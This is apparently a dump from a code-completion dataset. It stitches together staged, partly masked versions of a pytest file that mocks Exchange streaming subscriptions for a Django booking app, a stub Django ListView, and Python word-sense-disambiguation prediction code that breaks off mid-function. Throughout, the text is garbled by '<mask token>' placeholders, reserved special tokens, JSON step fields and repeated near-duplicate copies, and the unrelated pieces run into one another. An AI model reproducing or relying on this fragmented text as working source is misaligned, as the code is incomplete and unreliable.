request.xpath('//m:Unsubscribe', namespaces=NAMESPACES):\n return\n subscription_id = request.xpath('//m:SubscriptionId', namespaces=\n NAMESPACES)[0].text\n self.subscription_to_resource.pop(subscription_id)\n return M.UnsubscribeResponse(M.ResponseMessages(M.\n UnsubscribeResponseMessage(M.ResponseCode('NoError'),\n ResponseClass='Success')))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SubscriptionHandler(object):\n \"\"\"\n SoapSeller handler for the streaming requests.\n \"\"\"\n\n def __init__(self, resource):\n self.resource = resource\n self.subscription_to_resource = {}\n\n def handle_subscribe(self, request):\n if not request.xpath('//m:StreamingSubscriptionRequest', namespaces\n =NAMESPACES):\n return\n emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)\n assert len(emails) == 1\n assert emails[0].text == self.resource.principal_email\n subscription_id = get_random_string(10)\n self.subscription_to_resource[subscription_id] = self.resource\n return M.SubscribeResponse(M.ResponseMessages(M.\n SubscribeResponseMessage(M.ResponseCode('NoError'), M.\n SubscriptionId(subscription_id), ResponseClass='Success')))\n\n def _generate_event(self, type):\n return getattr(T, type)(T.TimeStamp(now().isoformat()), T.ItemId(Id\n =get_random_string(), ChangeKey=get_random_string()), T.\n ParentFolderId(Id=get_random_string(), ChangeKey=\n get_random_string()))\n\n def handle_get_events(self, request):\n if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES):\n return\n sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0\n ].text\n return M.GetStreamingEventsResponse(M.ResponseMessages(M.\n GetStreamingEventsResponseMessage(M.ResponseCode('NoError'), M.\n Notifications(M.Notification(T.SubscriptionId(sub_id), self.\n _generate_event('NewMailEvent'))), ResponseClass='Success')))\n\n def handle_unsubscribe(self, request):\n if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES):\n return\n subscription_id = request.xpath('//m:SubscriptionId', namespaces=\n NAMESPACES)[0].text\n self.subscription_to_resource.pop(subscription_id)\n return M.UnsubscribeResponse(M.ResponseMessages(M.\n UnsubscribeResponseMessage(M.ResponseCode('NoError'),\n ResponseClass='Success')))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SubscriptionHandler(object):\n \"\"\"\n SoapSeller handler for the streaming requests.\n \"\"\"\n\n def __init__(self, resource):\n self.resource = resource\n self.subscription_to_resource = {}\n\n def handle_subscribe(self, request):\n if not request.xpath('//m:StreamingSubscriptionRequest', namespaces\n =NAMESPACES):\n return\n emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)\n assert len(emails) == 1\n assert emails[0].text == self.resource.principal_email\n subscription_id = get_random_string(10)\n self.subscription_to_resource[subscription_id] = self.resource\n return M.SubscribeResponse(M.ResponseMessages(M.\n SubscribeResponseMessage(M.ResponseCode('NoError'), M.\n SubscriptionId(subscription_id), ResponseClass='Success')))\n\n def _generate_event(self, type):\n return getattr(T, type)(T.TimeStamp(now().isoformat()), T.ItemId(Id\n =get_random_string(), ChangeKey=get_random_string()), T.\n ParentFolderId(Id=get_random_string(), ChangeKey=\n get_random_string()))\n\n def handle_get_events(self, request):\n if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES):\n return\n sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0\n ].text\n return M.GetStreamingEventsResponse(M.ResponseMessages(M.\n GetStreamingEventsResponseMessage(M.ResponseCode('NoError'), M.\n Notifications(M.Notification(T.SubscriptionId(sub_id), self.\n _generate_event('NewMailEvent'))), ResponseClass='Success')))\n\n def handle_unsubscribe(self, request):\n if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES):\n return\n subscription_id = request.xpath('//m:SubscriptionId', namespaces=\n NAMESPACES)[0].text\n self.subscription_to_resource.pop(subscription_id)\n return M.UnsubscribeResponse(M.ResponseMessages(M.\n UnsubscribeResponseMessage(M.ResponseCode('NoError'),\n ResponseClass='Success')))\n\n\n@pytest.mark.django_db\ndef test_listener(settings, space_resource, exchange, monkeypatch):\n email = 
'%s@example.com' % get_random_string()\n ex_resource = ExchangeResource.objects.create(resource=space_resource,\n principal_email=email, exchange=exchange, sync_to_respa=True)\n assert ex_resource.reservations.count() == 0\n delegate = SubscriptionHandler(ex_resource)\n SoapSeller.wire(settings, delegate)\n notification_listener = listener.NotificationListener()\n synced_resources = []\n\n def sync_resource(resource):\n synced_resources.append(resource)\n notification_listener.stop()\n monkeypatch.setattr(listener, 'sync_from_exchange', sync_resource)\n notification_listener.start()\n assert ex_resource in synced_resources\n",
"step-4": "import pytest\nfrom django.utils.crypto import get_random_string\nfrom django.utils.timezone import now\nfrom respa_exchange import listener\nfrom respa_exchange.ews.xml import M, NAMESPACES, T\nfrom respa_exchange.models import ExchangeResource\nfrom respa_exchange.tests.session import SoapSeller\n\n\nclass SubscriptionHandler(object):\n \"\"\"\n SoapSeller handler for the streaming requests.\n \"\"\"\n\n def __init__(self, resource):\n self.resource = resource\n self.subscription_to_resource = {}\n\n def handle_subscribe(self, request):\n if not request.xpath('//m:StreamingSubscriptionRequest', namespaces\n =NAMESPACES):\n return\n emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)\n assert len(emails) == 1\n assert emails[0].text == self.resource.principal_email\n subscription_id = get_random_string(10)\n self.subscription_to_resource[subscription_id] = self.resource\n return M.SubscribeResponse(M.ResponseMessages(M.\n SubscribeResponseMessage(M.ResponseCode('NoError'), M.\n SubscriptionId(subscription_id), ResponseClass='Success')))\n\n def _generate_event(self, type):\n return getattr(T, type)(T.TimeStamp(now().isoformat()), T.ItemId(Id\n =get_random_string(), ChangeKey=get_random_string()), T.\n ParentFolderId(Id=get_random_string(), ChangeKey=\n get_random_string()))\n\n def handle_get_events(self, request):\n if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES):\n return\n sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0\n ].text\n return M.GetStreamingEventsResponse(M.ResponseMessages(M.\n GetStreamingEventsResponseMessage(M.ResponseCode('NoError'), M.\n Notifications(M.Notification(T.SubscriptionId(sub_id), self.\n _generate_event('NewMailEvent'))), ResponseClass='Success')))\n\n def handle_unsubscribe(self, request):\n if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES):\n return\n subscription_id = request.xpath('//m:SubscriptionId', namespaces=\n NAMESPACES)[0].text\n 
self.subscription_to_resource.pop(subscription_id)\n return M.UnsubscribeResponse(M.ResponseMessages(M.\n UnsubscribeResponseMessage(M.ResponseCode('NoError'),\n ResponseClass='Success')))\n\n\n@pytest.mark.django_db\ndef test_listener(settings, space_resource, exchange, monkeypatch):\n email = '%s@example.com' % get_random_string()\n ex_resource = ExchangeResource.objects.create(resource=space_resource,\n principal_email=email, exchange=exchange, sync_to_respa=True)\n assert ex_resource.reservations.count() == 0\n delegate = SubscriptionHandler(ex_resource)\n SoapSeller.wire(settings, delegate)\n notification_listener = listener.NotificationListener()\n synced_resources = []\n\n def sync_resource(resource):\n synced_resources.append(resource)\n notification_listener.stop()\n monkeypatch.setattr(listener, 'sync_from_exchange', sync_resource)\n notification_listener.start()\n assert ex_resource in synced_resources\n",
"step-5": "import pytest\nfrom django.utils.crypto import get_random_string\nfrom django.utils.timezone import now\n\nfrom respa_exchange import listener\nfrom respa_exchange.ews.xml import M, NAMESPACES, T\nfrom respa_exchange.models import ExchangeResource\nfrom respa_exchange.tests.session import SoapSeller\n\n\nclass SubscriptionHandler(object):\n \"\"\"\n SoapSeller handler for the streaming requests.\n \"\"\"\n\n def __init__(self, resource):\n self.resource = resource\n self.subscription_to_resource = {}\n\n def handle_subscribe(self, request):\n if not request.xpath('//m:StreamingSubscriptionRequest', namespaces=NAMESPACES): # pragma: no cover\n return\n emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)\n assert len(emails) == 1\n assert emails[0].text == self.resource.principal_email\n subscription_id = get_random_string(10)\n self.subscription_to_resource[subscription_id] = self.resource\n return M.SubscribeResponse(\n M.ResponseMessages(\n M.SubscribeResponseMessage(\n M.ResponseCode('NoError'),\n M.SubscriptionId(subscription_id),\n ResponseClass='Success',\n ),\n ),\n )\n\n def _generate_event(self, type):\n return getattr(T, type)(\n T.TimeStamp(now().isoformat()),\n T.ItemId(\n Id=get_random_string(),\n ChangeKey=get_random_string(),\n ),\n T.ParentFolderId(\n Id=get_random_string(),\n ChangeKey=get_random_string(),\n ),\n )\n\n def handle_get_events(self, request):\n if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES): # pragma: no cover\n return\n sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0].text\n # This would be a long-polling operation,\n # but ain't nobody got time for that\n return M.GetStreamingEventsResponse(\n M.ResponseMessages(\n M.GetStreamingEventsResponseMessage(\n M.ResponseCode('NoError'),\n M.Notifications(\n M.Notification(\n T.SubscriptionId(sub_id),\n self._generate_event('NewMailEvent'),\n ),\n ),\n ResponseClass='Success',\n ),\n ),\n )\n\n def handle_unsubscribe(self, 
request):\n if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES): # pragma: no cover\n return\n subscription_id = request.xpath('//m:SubscriptionId', namespaces=NAMESPACES)[0].text\n self.subscription_to_resource.pop(subscription_id)\n return M.UnsubscribeResponse(\n M.ResponseMessages(\n M.UnsubscribeResponseMessage(\n M.ResponseCode('NoError'),\n ResponseClass='Success',\n ),\n ),\n )\n\n\n@pytest.mark.django_db\ndef test_listener(settings, space_resource, exchange, monkeypatch):\n email = '%s@example.com' % get_random_string()\n ex_resource = ExchangeResource.objects.create(\n resource=space_resource,\n principal_email=email,\n exchange=exchange,\n sync_to_respa=True,\n )\n assert ex_resource.reservations.count() == 0\n delegate = SubscriptionHandler(ex_resource)\n SoapSeller.wire(settings, delegate)\n\n notification_listener = listener.NotificationListener()\n\n synced_resources = [] # Keep track of the resources we get sync-request events for\n\n def sync_resource(resource): # Our pretend sync handler\n synced_resources.append(resource)\n # Ask the listener to stop after we get a resource,\n # so this test actually ends someday:\n notification_listener.stop()\n\n monkeypatch.setattr(listener, 'sync_from_exchange', sync_resource)\n notification_listener.start()\n # ... so when `sync_resource` is called, this'll eventually happen:\n assert ex_resource in synced_resources\n",
"step-ids": [
4,
7,
8,
9,
10
]
}
|
[
4,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ExperimentList(ListView):
pass
<|reserved_special_token_1|>
from django.views.generic import ListView
class ExperimentList(ListView):
pass
|
flexible
|
{
"blob_id": "10990282c8aa0b9b26a69e451132ff37257acbc6",
"index": 3331,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ExperimentList(ListView):\n pass\n",
"step-3": "from django.views.generic import ListView\n\n\nclass ExperimentList(ListView):\n pass\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def predict_babelnet(input_path: str, output_path: str, resources_path: str
) ->None:
global mfs_counter
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
print('>>>> BABELNET PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'babelnet.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
0][0], vocab=vocab_label_bn, enable_coarse_grained=1,
vocab_for_coarse=None)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_wordnet_domains(input_path: str, output_path: str,
resources_path: str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <wordnetDomain>" format (e.g. "d000.s000.t000 sport").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> WORDNET DOMAINS PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
correctly_saved = 0
bn2wndom = get_bn2wndomains()
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'wndomains.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,
vocab_for_coarse=bn2wndom)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_lexicographer(input_path: str, output_path: str, resources_path:
str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <lexicographerId>" format (e.g. "d000.s000.t000 noun.animal").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> LEXICOGRAPHER PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
bn2lex = get_bn2lex()
filename = filename[:-3] + 'lexicon.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
2][0], vocab=vocab_label_lex, enable_coarse_grained=3,
vocab_for_coarse=bn2lex)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
<|reserved_special_token_0|>
def __write_result(filename: str, frase, resources_path: str, outputh_path:
str, predictions, vocab=None, enable_coarse_grained: int=1,
vocab_for_coarse=None) ->int:
"""
Write results in the file system
:param filename: the name of the file to save
:param frase: the object from which recover the sentence
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:param output_path: the path of the output file (where you save your predictions)
:param predictions: the predictions made by the system
:param vocab: the vocab needed for giving a sense
:param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab_for_coarse: The vocab in support of mode 2 or 3
:return: 1 if succeeds
"""
global mfs_counter
bn2wn = get_bn2wn()
lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')
to_write = []
for index, parola in enumerate(frase):
name = parola.xpath('name()')
if name == 'instance':
id = parola.get('id')
list_of_possible_senses_first_step = lemma2wn.get(parola.text)
if not list_of_possible_senses_first_step:
the_actual_meaning = MFS(parola, bn2wn, vocab2=
vocab_for_coarse, pred_case=enable_coarse_grained)
mfs_counter += 1
to_write.append((id, the_actual_meaning))
continue
list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(
list_of_possible_senses_first_step, bn2wn)
candidates, list_of_possible_senses_bn_version = (
create_custom_label(list_of_possible_senses_bn_version,
parola.text, vocab, predictions[index],
enable_coarse_grained=enable_coarse_grained))
the_actual_meaning = None
if candidates:
argmax = np.argmax(candidates)
the_actual_meaning = list_of_possible_senses_bn_version[argmax]
else:
mfs_counter += 1
the_actual_meaning = MFS(parola, bn2wn, vocab2=
vocab_for_coarse, pred_case=enable_coarse_grained)
to_write.append((id, the_actual_meaning))
with open(outputh_path + '/' + filename, 'a') as test_saving:
for tupla in to_write:
test_saving.write(tupla[0] + ' ' + tupla[1] + '\n')
del to_write
del lemma2wn
del bn2wn
return 1
def MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:
"""
Returns the sense by applying the Most Frequent Sense (MFS) strategy
:param parola: the Element object to which associate a sense
:param vocab: the vocab needed for giving a sense
:param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:return: the chosen sense with the MFS technique
"""
pos = parola.get('pos')
pos_input = __decide_pos(pos)
wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)
try:
wordnet_object = wordnet_object[0]
except:
print(wordnet_object)
print(parola.text)
wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8
) + wordnet_object.pos()
the_actual_meaning = next(key for key, value in vocab.items() if
wn_synset in value)
to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=
vocab2, pred_case=pred_case)
return to_return
def __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:
Dict=None) ->str:
"""
Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction
:param value: The Value from which to extrapolate the actual meaning found
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab: The vocab in support of mode 2 or 3.
:return: the actual meaning found with MFS
"""
the_meaning_to_explot = __type_checker(value)
if pred_case == 1:
return the_meaning_to_explot
if pred_case == 2:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0] if to_return else 'factotum'
if pred_case == 3:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0]
def __type_checker(value: object) ->str:
"""
Checks the type of the object and, accordingly, returns it
:param value: the value to examinate
:return: a string that is the value expected
"""
if type(value) == str:
return value
if type(value) == list:
return value[0]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def predict_babelnet(input_path: str, output_path: str, resources_path: str
) ->None:
global mfs_counter
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
print('>>>> BABELNET PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'babelnet.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
0][0], vocab=vocab_label_bn, enable_coarse_grained=1,
vocab_for_coarse=None)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_wordnet_domains(input_path: str, output_path: str,
resources_path: str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <wordnetDomain>" format (e.g. "d000.s000.t000 sport").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> WORDNET DOMAINS PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
correctly_saved = 0
bn2wndom = get_bn2wndomains()
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'wndomains.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,
vocab_for_coarse=bn2wndom)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_lexicographer(input_path: str, output_path: str, resources_path:
str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <lexicographerId>" format (e.g. "d000.s000.t000 noun.animal").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> LEXICOGRAPHER PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
bn2lex = get_bn2lex()
filename = filename[:-3] + 'lexicon.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
2][0], vocab=vocab_label_lex, enable_coarse_grained=3,
vocab_for_coarse=bn2lex)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def __predict(input_path: str, resources_path: str) ->Tuple:
    """
    Runs the trained WSD network over every sentence of the input corpus.

    :param input_path: path of the XML input file (Raganato's framework format)
    :param resources_path: path of the resources folder (model weights, vocabularies)
    :return: a tuple (per-sentence network outputs, XML sentence elements)
    """
    sentences, xml_tree = load_dataset(input_path)
    sentences = [sentence for sentence in sentences if sentence]
    # The three output layers are sized after the three label vocabularies.
    vocab_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
    vocab_bn = create_mapping_dictionary(resources_path, mode='bn')
    vocab_lex = create_mapping_dictionary(resources_path, mode='lex')
    network = WSD(resources_path + '/vocabularies/bert_vocab.txt',
        [len(vocab_bn), len(vocab_wndmn), len(vocab_lex)],
        dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)
    tokenizer = network.tokenizatore
    network.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5')
    predictions = []
    sentences_xml_elements = xml_tree.xpath('/*/*/*')
    for sentence in sentences:
        word_ids, mask, segments = convert_sentence_to_features_no_padding(
            sentence, tokenizer)
        predictions.append(network.model.predict({'input_word_ids':
            word_ids, 'input_mask': mask, 'segment_ids': segments}, verbose=1))
    del vocab_lex
    del vocab_wndmn
    del vocab_bn
    return predictions, sentences_xml_elements
def __write_result(filename: str, frase, resources_path: str, outputh_path:
    str, predictions, vocab=None, enable_coarse_grained: int=1,
    vocab_for_coarse=None) ->int:
    """
    Write results in the file system
    :param filename: the name of the file to save
    :param frase: the object from which recover the sentence
    :param resources_path: the path of the resources folder containing your model and stuff you might need.
    :param output_path: the path of the output file (where you save your predictions)
    :param predictions: the predictions made by the system
    :param vocab: the vocab needed for giving a sense
    :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:
    1 --> Means I'm predicting with Babelnet. No extra precautions needed
    2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
    3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
    :param vocab_for_coarse: The vocab in support of mode 2 or 3
    :return: 1 if succeeds
    """
    global mfs_counter
    # Static mappings: BabelNet id -> WordNet id(s), and lemma -> candidate WN ids.
    bn2wn = get_bn2wn()
    lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')
    to_write = []
    for index, parola in enumerate(frase):
        name = parola.xpath('name()')
        # Only <instance> elements need disambiguation; other tokens are skipped.
        if name == 'instance':
            id = parola.get('id')
            list_of_possible_senses_first_step = lemma2wn.get(parola.text)
            if not list_of_possible_senses_first_step:
                # Lemma unknown to the mapping: fall back to Most Frequent Sense.
                the_actual_meaning = MFS(parola, bn2wn, vocab2=
                    vocab_for_coarse, pred_case=enable_coarse_grained)
                mfs_counter += 1
                to_write.append((id, the_actual_meaning))
                continue
            # Restrict the network's scores to this lemma's candidate senses.
            list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(
                list_of_possible_senses_first_step, bn2wn)
            candidates, list_of_possible_senses_bn_version = (
                create_custom_label(list_of_possible_senses_bn_version,
                parola.text, vocab, predictions[index],
                enable_coarse_grained=enable_coarse_grained))
            the_actual_meaning = None
            if candidates:
                # Pick the candidate sense the network scored highest.
                argmax = np.argmax(candidates)
                the_actual_meaning = list_of_possible_senses_bn_version[argmax]
            else:
                # No candidate survived the vocabulary lookup: MFS fallback.
                mfs_counter += 1
                the_actual_meaning = MFS(parola, bn2wn, vocab2=
                    vocab_for_coarse, pred_case=enable_coarse_grained)
            to_write.append((id, the_actual_meaning))
    # Append mode: predictions of successive sentences accumulate in one file.
    with open(outputh_path + '/' + filename, 'a') as test_saving:
        for tupla in to_write:
            test_saving.write(tupla[0] + ' ' + tupla[1] + '\n')
    del to_write
    del lemma2wn
    del bn2wn
    return 1
def MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:
    """
    Returns the sense by applying the Most Frequent Sense (MFS) strategy
    :param parola: the Element object to which associate a sense
    :param vocab: the vocab needed for giving a sense
    :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained
    :param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
    1 --> Means I'm predicting with Babelnet. No extra precautions needed
    2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
    3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
    :return: the chosen sense with the MFS technique
    """
    pos = parola.get('pos')
    pos_input = __decide_pos(pos)
    # WordNet lists synsets by decreasing frequency, so the first entry is the MFS.
    wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)
    try:
        wordnet_object = wordnet_object[0]
    except IndexError:
        # No synset for this lemma/pos pair: log it. NOTE(review): execution
        # still falls through and the .offset() call below fails on the empty
        # list; the original bare `except:` behaved the same way but also
        # swallowed SystemExit/KeyboardInterrupt, so it was narrowed here.
        print(wordnet_object)
        print(parola.text)
    # Build the "wn:<zero-padded offset><pos>" key and reverse-map it to its
    # BabelNet id (next() raises StopIteration if the synset is not in vocab).
    wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8
        ) + wordnet_object.pos()
    the_actual_meaning = next(key for key, value in vocab.items() if
        wn_synset in value)
    to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=
        vocab2, pred_case=pred_case)
    return to_return
def __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:
    Dict=None) ->str:
    """
    Normalizes a BabelNet id found by MFS and, depending on the prediction
    mode, maps it through the coarse-grained vocabulary.

    :param value: either a BabelNet id string or a list whose first element is one
    :param pred_case: 1 -> BabelNet (the id is returned as is);
                      2 -> WordNet Domains ('factotum' when no mapping exists);
                      3 -> Lexicographer (a mapping is assumed to exist)
    :param vocab: the coarse-grained mapping used for modes 2 and 3
    :return: the extracted/converted meaning
    """
    meaning = __type_checker(value)
    if pred_case == 1:
